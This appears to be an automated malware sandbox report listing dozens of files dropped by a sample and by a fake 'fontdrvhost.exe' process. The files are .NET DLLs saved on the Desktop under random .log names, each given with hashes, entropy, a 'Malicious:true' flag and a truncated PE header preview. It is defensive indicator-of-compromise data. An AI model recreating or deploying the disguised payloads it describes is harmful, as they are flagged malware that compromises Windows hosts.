                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\pntLeisv.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\pzYaRqdW.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\qguCdZEu.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\qiEMTywj.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\qiKKKJQB.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\qxbJOXLg.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\rAfUMkjC.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\rmtKjMmm.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\rrvChBIx.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\rudcNvNr.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\sQxsIGwX.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                  C:\Users\user\Desktop\sXAbZyyE.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\sYhLnqXd.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\sihlzJJp.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\tAOrkGQb.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\tIxJOpqh.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\tqrrAUxf.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\uHokLZDZ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\uJzjHyIX.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                  C:\Users\user\Desktop\uRiBlhjd.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
